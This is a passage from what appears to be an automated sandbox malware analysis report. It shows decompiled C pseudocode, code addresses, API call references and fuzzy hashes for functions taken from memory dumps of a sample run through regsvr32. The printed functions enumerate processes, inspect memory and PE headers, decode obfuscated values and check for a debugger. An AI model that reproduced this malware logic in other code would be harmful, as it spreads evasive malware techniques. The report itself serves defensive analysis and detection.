								if(_t62 != 0) {
									_push(_t62);
									E001A1000();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0x1aa2d0; // 0x69b25f44
								_t52 = E001A3154(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E001A496F(0, _t52) != 0) {
								_t109 =  *0x1aa37c; // 0x32f9858
								E001A25ED(_t109 + 4, _t57);
							}
							_t53 =  *0x1aa2d4; // 0x314d7d0
							_t22 = _t53 + 0x1ab2d2; // 0x32f8aa2
							_t23 = _t53 + 0x1ab7c4; // 0x6976612e
							 *0x1aa320 = _t22;
							 *0x1aa390 = _t23;
							HeapFree( *0x1aa290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}































                                    0x001a2654
                                    0x001a2657
                                    0x001a2677
                                    0x001a2685
                                    0x001a2685
                                    0x001a268a
                                    0x001a26a4
                                    0x001a28b1
                                    0x001a28b8
                                    0x001a28bf
                                    0x001a28bf
                                    0x001a26aa
                                    0x001a26c6
                                    0x001a289f
                                    0x001a28a9
                                    0x00000000
                                    0x001a26cc
                                    0x001a26cc
                                    0x001a26d1
                                    0x001a26e7
                                    0x001a26d3
                                    0x001a26d3
                                    0x001a26e0
                                    0x001a26e0
                                    0x001a26f1
                                    0x001a26f3
                                    0x001a26fd
                                    0x001a2702
                                    0x001a2702
                                    0x001a26fd
                                    0x001a2709
                                    0x001a271f
                                    0x001a270b
                                    0x001a270b
                                    0x001a2718
                                    0x001a2718
                                    0x001a2723
                                    0x001a2725
                                    0x001a272f
                                    0x001a2734
                                    0x001a2734
                                    0x001a272f
                                    0x001a273b
                                    0x001a2751
                                    0x001a273d
                                    0x001a273d
                                    0x001a274a
                                    0x001a274a
                                    0x001a2755
                                    0x001a2757
                                    0x001a2761
                                    0x001a2766
                                    0x001a2766
                                    0x001a2761
                                    0x001a276d
                                    0x001a2783
                                    0x001a276f
                                    0x001a276f
                                    0x001a277c
                                    0x001a277c
                                    0x001a2787
                                    0x001a2789
                                    0x001a2793
                                    0x001a2798
                                    0x001a2798
                                    0x001a2793
                                    0x001a279f
                                    0x001a27b5
                                    0x001a27a1
                                    0x001a27a1
                                    0x001a27ae
                                    0x001a27ae
                                    0x001a27b9
                                    0x001a27bb
                                    0x001a27c5
                                    0x001a27ca
                                    0x001a27ca
                                    0x001a27c5
                                    0x001a27d1
                                    0x001a27e7
                                    0x001a27d3
                                    0x001a27d3
                                    0x001a27e0
                                    0x001a27e0
                                    0x001a27eb
                                    0x001a27fe
                                    0x001a27fe
                                    0x00000000
                                    0x001a27ed
                                    0x001a27ed
                                    0x001a27f7
                                    0x00000000
                                    0x001a2808
                                    0x001a2808
                                    0x001a280a
                                    0x001a2820
                                    0x001a280c
                                    0x001a280c
                                    0x001a2819
                                    0x001a2819
                                    0x001a2824
                                    0x001a2826
                                    0x001a2829
                                    0x001a282a
                                    0x001a2831
                                    0x001a2833
                                    0x001a2834
                                    0x001a2834
                                    0x001a2831
                                    0x001a283b
                                    0x001a2851
                                    0x001a283d
                                    0x001a283d
                                    0x001a284a
                                    0x001a284a
                                    0x001a2855
                                    0x001a2863
                                    0x001a286d
                                    0x001a286d
                                    0x001a2872
                                    0x001a2878
                                    0x001a2885
                                    0x001a288b
                                    0x001a2891
                                    0x001a2896
                                    0x001a289c
                                    0x00000000
                                    0x001a289c
                                    0x001a27f7
                                    0x001a27eb

                                    APIs
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A26F9
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A272B
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A275D
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A278F
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A27C1
                                    • StrToIntExA.SHLWAPI(00000000,00000000,001A5FAE), ref: 001A27F3
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 001A2896
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 001A28A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: ~Bu
                                    • API String ID: 3298025750-1087964839
                                    • Opcode ID: dfbf88b24b69059f1f7b415c789fc8a0870024df0582ed92fed87be2c95ddec5
                                    • Instruction ID: 45c313ae09d02a8f3fb82c831ab382a40508cf62af685dc9d30c7cf3ef812fcf
                                    • Opcode Fuzzy Hash: dfbf88b24b69059f1f7b415c789fc8a0870024df0582ed92fed87be2c95ddec5
                                    • Instruction Fuzzy Hash: 98717278A00204AACB11DBFCCD89EAF77E9AF5B700B640826F402D3615EB35DE44DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A2495, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E6E2A2495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e2a41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e2a4240 = 1;
										__eflags =  *0x6e2a4240;
										if( *0x6e2a4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e2a41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e2a4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e2a41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e2a4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e2a41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e2a4240 = 1;
							__eflags =  *0x6e2a4240;
							if( *0x6e2a4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e2a4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e2a4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e2a41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e2a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                    0x6e2a249f
                                    0x6e2a24a2
                                    0x6e2a24a8
                                    0x6e2a24c6
                                    0x00000000
                                    0x6e2a24c6
                                    0x6e2a24b0
                                    0x6e2a24b9
                                    0x6e2a24bf
                                    0x6e2a24ce
                                    0x6e2a24d1
                                    0x6e2a24d4
                                    0x6e2a24de
                                    0x6e2a24de
                                    0x6e2a24e0
                                    0x6e2a24e3
                                    0x6e2a24e5
                                    0x6e2a24e5
                                    0x6e2a24e7
                                    0x6e2a24ea
                                    0x00000000
                                    0x00000000
                                    0x6e2a24ec
                                    0x6e2a24ee
                                    0x6e2a2554
                                    0x6e2a2554
                                    0x6e2a26b2
                                    0x00000000
                                    0x6e2a26b2
                                    0x6e2a24f0
                                    0x6e2a24f0
                                    0x6e2a24f4
                                    0x6e2a24f6
                                    0x6e2a24f6
                                    0x6e2a24f6
                                    0x6e2a24f6
                                    0x6e2a24f9
                                    0x6e2a24fa
                                    0x6e2a24fd
                                    0x6e2a24fd
                                    0x6e2a2501
                                    0x6e2a2505
                                    0x6e2a2513
                                    0x6e2a2513
                                    0x6e2a251b
                                    0x6e2a2521
                                    0x6e2a2523
                                    0x6e2a2525
                                    0x6e2a2535
                                    0x6e2a2542
                                    0x6e2a2546
                                    0x6e2a254b
                                    0x6e2a254d
                                    0x6e2a25cb
                                    0x6e2a25cb
                                    0x6e2a254f
                                    0x6e2a254f
                                    0x6e2a254f
                                    0x6e2a25cd
                                    0x6e2a25cf
                                    0x6e2a26b0
                                    0x6e2a26b0
                                    0x00000000
                                    0x6e2a25d5
                                    0x6e2a25d5
                                    0x6e2a25dc
                                    0x00000000
                                    0x00000000
                                    0x6e2a25e2
                                    0x6e2a25e6
                                    0x6e2a2642
                                    0x6e2a2644
                                    0x6e2a264c
                                    0x6e2a264e
                                    0x6e2a2650
                                    0x00000000
                                    0x00000000
                                    0x6e2a2652
                                    0x6e2a2658
                                    0x6e2a265a
                                    0x6e2a265c
                                    0x6e2a2671
                                    0x6e2a2671
                                    0x6e2a2673
                                    0x6e2a26a2
                                    0x6e2a26a9
                                    0x00000000
                                    0x6e2a26a9
                                    0x6e2a2677
                                    0x6e2a2678
                                    0x6e2a267a
                                    0x6e2a267c
                                    0x6e2a267c
                                    0x6e2a267e
                                    0x6e2a2680
                                    0x6e2a2682
                                    0x6e2a2696
                                    0x6e2a2696
                                    0x6e2a2699
                                    0x6e2a269b
                                    0x6e2a269b
                                    0x6e2a269c
                                    0x6e2a269c
                                    0x00000000
                                    0x6e2a2684
                                    0x6e2a2684
                                    0x6e2a2684
                                    0x6e2a268d
                                    0x6e2a268e
                                    0x6e2a2690
                                    0x6e2a2692
                                    0x6e2a2692
                                    0x00000000
                                    0x6e2a2684
                                    0x6e2a2682
                                    0x6e2a265e
                                    0x6e2a2665
                                    0x6e2a2665
                                    0x6e2a2667
                                    0x00000000
                                    0x00000000
                                    0x6e2a2669
                                    0x6e2a266a
                                    0x6e2a266d
                                    0x6e2a266f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a266f
                                    0x00000000
                                    0x6e2a2665
                                    0x6e2a25e8
                                    0x6e2a25eb
                                    0x6e2a25f0
                                    0x00000000
                                    0x00000000
                                    0x6e2a25f9
                                    0x6e2a25fb
                                    0x6e2a2601
                                    0x00000000
                                    0x00000000
                                    0x6e2a2607
                                    0x6e2a260d
                                    0x00000000
                                    0x00000000
                                    0x6e2a2613
                                    0x6e2a2615
                                    0x6e2a261e
                                    0x6e2a2622
                                    0x00000000
                                    0x00000000
                                    0x6e2a2628
                                    0x6e2a262b
                                    0x6e2a262d
                                    0x00000000
                                    0x00000000
                                    0x6e2a2634
                                    0x6e2a2636
                                    0x00000000
                                    0x00000000
                                    0x6e2a2638
                                    0x6e2a263c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a263c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a2527
                                    0x6e2a2527
                                    0x6e2a2527
                                    0x6e2a252e
                                    0x00000000
                                    0x00000000
                                    0x6e2a2530
                                    0x6e2a2531
                                    0x6e2a2533
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a2533
                                    0x6e2a255b
                                    0x6e2a255d
                                    0x00000000
                                    0x00000000
                                    0x6e2a256d
                                    0x6e2a256f
                                    0x6e2a2571
                                    0x00000000
                                    0x00000000
                                    0x6e2a2577
                                    0x6e2a257e
                                    0x6e2a25aa
                                    0x6e2a25aa
                                    0x6e2a25ac
                                    0x6e2a25ae
                                    0x6e2a25c2
                                    0x6e2a25c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a25b0
                                    0x6e2a25b0
                                    0x6e2a25b0
                                    0x6e2a25b9
                                    0x6e2a25ba
                                    0x6e2a25bc
                                    0x6e2a25be
                                    0x6e2a25be
                                    0x00000000
                                    0x6e2a25b0
                                    0x6e2a2580
                                    0x6e2a2583
                                    0x6e2a2585
                                    0x6e2a2597
                                    0x6e2a2597
                                    0x6e2a259a
                                    0x6e2a259c
                                    0x6e2a259c
                                    0x6e2a259d
                                    0x6e2a259d
                                    0x6e2a25a3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a2587
                                    0x6e2a2587
                                    0x6e2a2587
                                    0x6e2a258e
                                    0x00000000
                                    0x00000000
                                    0x6e2a2590
                                    0x6e2a2590
                                    0x6e2a2591
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a2591
                                    0x6e2a2593
                                    0x6e2a2595
                                    0x6e2a25a8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a25a8
                                    0x00000000
                                    0x6e2a2595
                                    0x6e2a2507
                                    0x6e2a250a
                                    0x6e2a250d
                                    0x00000000
                                    0x00000000
                                    0x6e2a250f
                                    0x6e2a2511
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a2511
                                    0x6e2a24d6
                                    0x6e2a24d8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • NtQueryVirtualMemory.NTDLL ref: 6E2A2546
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: MemoryQueryVirtual
                                    • String ID: @B*n$@B*n$@B*n
                                    • API String ID: 2850889275-250757524
                                    • Opcode ID: e41d41d7feb185d93986887bc5b7890fc710bf0ebc6c90ded88ce9d3452e4d3e
                                    • Instruction ID: 9a2c1d991ede8dcaa14f153a5bc977fcb9650bc85f402862cfa51ad7f52ea154
                                    • Opcode Fuzzy Hash: e41d41d7feb185d93986887bc5b7890fc710bf0ebc6c90ded88ce9d3452e4d3e
                                    • Instruction Fuzzy Hash: 3261E2B261560FCFEB49CEAFD8A065933B7FB85715B248429DB15C7284FB30D882C650
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A11B8, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E001A11B8() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x1aa2d4; // 0x314d7d0
						_t2 = _t9 + 0x1abde4; // 0x73617661
						_push( &_v264);
						if( *0x1aa118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                    0x001a11c3
                                    0x001a11cd
                                    0x001a11d1
                                    0x001a11db
                                    0x001a120c
                                    0x001a11e2
                                    0x001a11e7
                                    0x001a11f4
                                    0x001a11fd
                                    0x001a1214
                                    0x001a11ff
                                    0x001a1207
                                    0x00000000
                                    0x001a1207
                                    0x001a1215
                                    0x001a1216
                                    0x00000000
                                    0x001a1216
                                    0x00000000
                                    0x001a1210
                                    0x001a121c
                                    0x001a1221

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A11C8
                                    • Process32First.KERNEL32(00000000,?), ref: 001A11DB
                                    • Process32Next.KERNEL32(00000000,?), ref: 001A1207
                                    • CloseHandle.KERNEL32(00000000), ref: 001A1216
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 9628e0b2d0853e4844422c4c920b95563d4f76886b61e91c14259b8569ebf53c
                                    • Instruction ID: 11e8bca74a2fae08b447468a8d52e0175734d963b082613cd7368c5bc49953a2
                                    • Opcode Fuzzy Hash: 9628e0b2d0853e4844422c4c920b95563d4f76886b61e91c14259b8569ebf53c
                                    • Instruction Fuzzy Hash: EBF0907E2011247AD720A6769C49FEB77ACDFD7350F1100A2F905C2001EB64DA9586A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1C6F, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E6E2A1C6F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e2a41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e2a41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e2a41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e2a41a8 = _t5;
					 *0x6e2a41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e2a41a4 = _t6;
					if(_t6 == 0) {
						 *0x6e2a41a4 =  *0x6e2a41a4 | 0xffffffff;
					}
					return 0;
				}
			}









                                    0x6e2a1c70
                                    0x6e2a1c7e
                                    0x6e2a1c86
                                    0x6e2a1c8b
                                    0x6e2a1cd5
                                    0x6e2a1cd5
                                    0x6e2a1c8d
                                    0x6e2a1c95
                                    0x6e2a1cd1
                                    0x6e2a1cd3
                                    0x6e2a1c97
                                    0x6e2a1c97
                                    0x6e2a1c9c
                                    0x6e2a1caa
                                    0x6e2a1caf
                                    0x6e2a1cb5
                                    0x6e2a1cbd
                                    0x6e2a1cc2
                                    0x6e2a1cc4
                                    0x6e2a1cc4
                                    0x6e2a1cce
                                    0x6e2a1cce

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2A1A30,74EC325B,00000000), ref: 6E2A1C7E
                                    • GetVersion.KERNEL32 ref: 6E2A1C8D
                                    • GetCurrentProcessId.KERNEL32 ref: 6E2A1C9C
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2A1CB5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CreateCurrentEventOpenVersion
                                    • String ID:
                                    • API String ID: 845504543-0
                                    • Opcode ID: c8411445bcfde97a392ef56a9a86f6c453317be6fa9d8acdfada56c64ad935c4
                                    • Instruction ID: ae7918485d24a90383fa1d605fb725aeadc7de54391ff589fb4634b2f7d69fb4
                                    • Opcode Fuzzy Hash: c8411445bcfde97a392ef56a9a86f6c453317be6fa9d8acdfada56c64ad935c4
                                    • Instruction Fuzzy Hash: 34F01771644E11EFEF509FACA80D78E3BA7B716722F19412AE205DA1C0DBB08483CB75
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C7327, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E2C741F
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2C7429
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E2C7436
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 9677af8e66bbaf9499110cf727ae6b276f47f91635840bb937f2ffae6c0d7071
                                    • Instruction ID: a9d3db9f4c8076c2081e12fbfe2dfb279c782f81b7303e74028a454cbbfe98ac
                                    • Opcode Fuzzy Hash: 9677af8e66bbaf9499110cf727ae6b276f47f91635840bb937f2ffae6c0d7071
                                    • Instruction Fuzzy Hash: AA31F67490122D9BCBA1DF64DC88BCDBBB9BF08710F1046DAE41CA7290EB709B818F55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C5D2F, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,6E2C5D05,?,6E2F4E10,0000000C,6E2C5E38,00000000,00000000,00000001,6E2C3545,6E2F4CE0,0000000C,6E2C33FD,?), ref: 6E2C5D50
                                    • TerminateProcess.KERNEL32(00000000,?,6E2C5D05,?,6E2F4E10,0000000C,6E2C5E38,00000000,00000000,00000001,6E2C3545,6E2F4CE0,0000000C,6E2C33FD,?), ref: 6E2C5D57
                                    • ExitProcess.KERNEL32 ref: 6E2C5D69
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 3be6de2b45e3a59dd45371b8de86251533fe4bc351b06af90847f1d0d5da3872
                                    • Instruction ID: 0c4135365782c36590e8a82e2ee0b7951e78303dcc0a7c966f204dac9c2fb601
                                    • Opcode Fuzzy Hash: 3be6de2b45e3a59dd45371b8de86251533fe4bc351b06af90847f1d0d5da3872
                                    • Instruction Fuzzy Hash: 12E04635040A08AFCF816FA0CD0DA983B3BEB02A8AB040914F8089A120DB75DD52CAA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C77FF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: d32234523ebc81fac8896242ca540ccbe98d311f69552c3cea30ebe9afa818f3
                                    • Instruction ID: 167f2551857a17ce910428519f3e9fb18dd8ec3655575324401076b778a6b799
                                    • Opcode Fuzzy Hash: d32234523ebc81fac8896242ca540ccbe98d311f69552c3cea30ebe9afa818f3
                                    • Instruction Fuzzy Hash: 7A31097181010E6FCB948EB8CC84EEB7B7EEF45B18F100398E919D7284E6319A44CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

